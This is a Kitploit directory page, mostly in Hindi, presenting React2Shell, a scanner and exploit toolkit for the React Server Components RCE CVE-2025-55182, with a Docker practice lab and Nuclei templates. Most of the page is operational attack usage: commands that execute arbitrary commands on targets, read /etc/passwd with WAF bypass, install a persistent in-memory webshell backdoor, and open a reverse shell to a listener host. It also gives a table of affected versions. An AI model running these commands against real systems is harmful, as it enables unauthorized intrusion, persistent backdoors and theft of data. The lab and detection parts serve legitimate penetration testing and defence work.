Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Shell — CVE-2025-55182 सुरक्षा परीक्षण किट: CLI स्कैनर + Chrome एक्सटेंशन + Nuclei टेम्पलेट + Docker लैब। | Kitploit
उपकरण/GitHubGitHub/sho-luv/react2shell
भेद्यता स्कैनरशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubsho-luv/react2shell
92149 महीने पहलेअभी तक समीक्षित नहीं

React2Shell

CVE-2025-55182 सुरक्षा परीक्षण किट: CLI स्कैनर + Chrome एक्सटेंशन + Nuclei टेम्पलेट + Docker लैब।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell

CVE-2025-55182 Next.js/React Server Components RCE के लिए स्कैनर और एक्सप्लॉइट टूलकिट।

रिपॉजिटरी संरचना

root@kitploit:~
React2Shell/
├── browser-extension/    # ब्राउज़र-आधारित पहचान के लिए Chrome एक्सटेंशन
│   ├── manifest.json
│   ├── content.js
│   ├── popup.html/js
│   └── background.js
├── cli/                  # कमांड-लाइन स्कैनर और एक्सप्लॉइट टूल
│   ├── react2shell.py
│   └── requirements.txt
├── docs/                 # सीखने-केंद्रित दस्तावेज़ीकरण
│   ├── README.md         # सीखने का पथ सूचकांक
│   ├── 01-fundamentals.md
│   ├── 02-vulnerability.md
│   ├── 03-exploitation.md
│   ├── 04-frameworks.md
│   └── 05-defense.md
├── lab/                  # परीक्षण के लिए Docker प्रयोगशाला वातावरण
│   ├── vulnerable/       # असुरक्षित Next.js ऐप (React 19.2.0)
│   ├── patched/          # पैच किया गया Next.js ऐप (React 19.2.1)
│   ├── waf/              # ModSecurity WAF कंटेनर
│   ├── waku-app/         # असुरक्षित Waku ऐप (React 19.2.0)
│   ├── react-router-app/ # असुरक्षित React Router ऐप (React 19.2.0)
│   └── docker-compose.yml
└── nuclei/               # Nuclei टेम्पलेट
    ├── CVE-2025-55182.yaml       # RCE पहचान (कोड निष्पादित करता है)
    └── CVE-2025-55182-safe.yaml  # सुरक्षित साइड-चैनल पहचान

त्वरित आरंभ

CLI उपकरण

root@kitploit:~
cd cli
pip install -r requirements.txt

# लक्ष्य स्कैन करें
python react2shell.py https://target.com

# कमांड निष्पादित करें
python react2shell.py https://target.com -c "id"

# इंटरैक्टिव शेल
python react2shell.py https://target.com -i

ब्राउज़र एक्सटेंशन

  1. chrome://extensions/ खोलें
  2. "डेवलपर मोड" सक्षम करें
  3. "अनपैक किया गया लोड करें" पर क्लिक करें
  4. browser-extension निर्देशिका चुनें

प्रयोगशाला वातावरण

root@kitploit:~
cd lab
docker-compose up -d

# Exploitable targets:
# Next.js Vulnerable:    http://localhost:3011  ← Full RCE
# Waku Vulnerable:       http://localhost:3014  ← RCE (blind - no HTTP output)
# React Router:          http://localhost:3015  ← Full RCE (ESM)

# Protected targets:
# Next.js Patched:       http://localhost:3012  ← Secure
# WAF Protected:         http://localhost:3013  ← ModSecurity blocks exploits

Nuclei स्कैनर

root@kitploit:~
nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com

विशेषताएँ

CLI उपकरण (cli/react2shell.py)

  • बहु-फ्रेमवर्क समर्थन - Next.js, Waku, React Router, Expo, Vite RSC, Parcel RSC
  • फ्रेमवर्क पहचान (--detect) - लक्ष्य फ्रेमवर्क का स्वतः पता लगाएं
  • एंडपॉइंट गणना (-E) - RSC एंडपॉइंट्स को स्वचालित रूप से खोजें
  • भेद्यता स्कैनिंग - एकल URL या फ़ाइल से बैच स्कैनिंग
  • कमांड निष्पादन (-c) - मनमाने आदेश चलाएं
  • इंटरैक्टिव शेल (-i) - स्थायी कमांड सत्र
  • रिवर्स शेल (-r) - कई प्रकार: nc, bash, perl, python, ruby
  • मेमोरी-आधारित वेबशेल (--webshell) - स्थायी बैकडोर स्थापना
  • फ़ाइल पढ़ना (-f) - दूरस्थ फ़ाइलें सीधे पढ़ें
  • स्थानीय स्कैनिंग (-L) - पैकेज.json में असुरक्षित संस्करणों की जाँच करें
  • WAF बाईपास - जंक पैडिंग (-w), यूनिकोड एन्कोडिंग (-u), Vercel-विशिष्ट (-V)
  • प्रॉक्सी समर्थन (-x) - Burp Suite या अन्य प्रॉक्सी के माध्यम से रूट करें
  • सुरक्षित मोड (-s) - कोड निष्पादन के बिना साइड-चैनल पहचान

ब्राउज़र एक्सटेंशन (browser-extension/)

  • RSC भेद्यता संकेतकों का स्वतः पता लगाना
  • कॉन्फ़िगरेबल एक्सप्लॉइट पथ
  • आउटपुट प्रदर्शन के साथ कमांड निष्पादन
  • सक्षम/अक्षम टॉगल
  • दृश्य असुरक्षित/सुरक्षित संकेतक

प्रयोगशाला वातावरण (lab/)

  • असुरक्षित Next.js (3011) - X-Action-Redirect के माध्यम से आउटपुट के साथ पूर्ण RCE
  • Waku (3014) - RCE की पुष्टि, /RSC/F/{x}/{y}.txt पथ प्रारूप आवश्यक
  • React Router (3015) - ESM-संगत process.getBuiltinModule() का उपयोग कर पूर्ण RCE
  • पैच किया गया Next.js (3012) - शोषण के बिना पहचान परीक्षण के लिए
  • WAF संरक्षित (3013) - बाईपास अनुसंधान के लिए ModSecurity नियम
  • डैशबोर्ड (8080) - हमले की लॉगिंग और विज़ुअलाइज़ेशन

CLI उपयोग उदाहरण

root@kitploit:~
# मूल स्कैन (फ्रेमवर्क का स्वतः पता लगाता है)
python react2shell.py https://target.com

# फ्रेमवर्क का पता लगाएं और एंडपॉइंट्स की गणना करें
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v

# विभिन्न फ्रेमवर्क पर कमांड निष्पादित करें
python react2shell.py https://target.com -c "id"                    # Next.js (स्वचालित)
python react2shell.py https://target.com -F waku -c "id"            # Waku (अंधा RCE)
python react2shell.py https://target.com -F react-router -c "id"    # React Router (ESM)

# आउटपुट के साथ प्रयोगशाला उदाहरण
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt"  # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id"        # React Router

# सभी WAF बाईपास के साथ कमांड निष्पादित करें
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u

# प्रॉक्सी के माध्यम से इंटरैक्टिव शेल
python react2shell.py https://target.com -i -x http://127.0.0.1:8080

# मेमोरी-आधारित वेबशेल स्थापित करें (पोर्ट 1337 पर बैकडोर बनाता है)
python react2shell.py https://target.com --webshell mypassword
# एक्सेस: curl 'http://target:1337/?p=mypassword&cmd=id'

# रिवर्स शेल
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash

# स्थानीय प्रोजेक्ट को असुरक्षित संस्करणों के लिए स्कैन करें
python react2shell.py -L /path/to/project

# आउटपुट के साथ बैच स्कैन
python react2shell.py targets.txt -t 20 -o results.json -v

सभी CLI विकल्प

root@kitploit:~
Execution Options:
  -c, --cmd             Command to execute
  -i, --interactive     Interactive shell session
  -r, --reverse         Reverse shell mode
  -l, --lhost           Listener host
  -p, --lport           Listener port
  -S, --shell-type      Shell type (nc, nc-mkfifo, bash, perl, python, ruby)
  -f, --read-file       Read a remote file

Scanning Options:
  -P, --path            Paths to test (comma-separated or file)
  -t, --threads         Number of threads (default: 10)
  -T, --timeout         Request timeout in seconds (default: 10)
  -s, --safe            Safe mode (no code execution)
  -L, --local           Scan local project directory
  -F, --framework       Target framework (auto, nextjs, waku, react-router, expo)
  -E, --enumerate       Enumerate RSC endpoints before exploitation
  --detect              Only detect framework and list endpoints
  --webshell            Install in-memory webshell on port 1337
  --rce                 RCE proof-of-concept mode (default: safe mode)

Bypass Options:
  -w, --waf-bypass      Junk data padding
  -W, --waf-size        Junk size in KB (default: 128)
  -u, --unicode         Unicode encoding bypass
  -V, --vercel-bypass   Vercel-specific bypass
  --windows             Windows PowerShell payloads

Request Options:
  -x, --proxy           Proxy URL (e.g., http://127.0.0.1:8080)
  -H, --header          Custom headers
  -A, --user-agent      Custom User-Agent
  -k, --insecure        Disable SSL verification

Output Options:
  -o, --output          Save results to JSON
  -v, --verbose         Verbose output with version detection
  -q, --quiet           Only show vulnerable targets
  --no-color            Disable colors
  --no-banner           Hide banner

CVE-2025-55182 विवरण

क्षेत्रमान
CVSS10.0 (गंभीर)
प्रभावअप्रमाणित दूरस्थ कोड निष्पादन (RCE)
प्रभावितकोई भी RSC फ्रेमवर्क जो असुरक्षित React संस्करणों का उपयोग करता है
तंत्रReact Flight Protocol के माध्यम से प्रोटोटाइप प्रदूषण

प्रभावित फ्रेमवर्क

फ्रेमवर्कअसुरक्षितपैच किया गया
React19.0.0 - 19.2.019.2.1+
Next.js14.0.0 - 15.4.715.4.8+
Waku< 0.27.20.27.2+
React Router7.0.0 - 7.5.0 (RSC preview)7.5.1+
ExpoExperimental RSCReact अपडेट करें
@vitejs/plugin-rscसभी असुरक्षित React के साथReact अपडेट करें
@parcel/rscसभी असुरक्षित React के साथReact अपडेट करें
RedwoodJS (rwsdk)सभी असुरक्षित React के साथReact अपडेट करें

श्रेय

  • mrknow001/RSC_Detector
  • assetnote/react2shell-scanner
  • Chocapikk/CVE-2025-55182
  • hackersatyamrastogi/react2shell-ultimate
  • ProjectDiscovery Nuclei Templates

अस्वीकरण

यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।


CVE-2025-55182 | CVSS 10.0 | केवल अधिकृत सुरक्षा परीक्षण के लिए

टूल डाउनलोड करें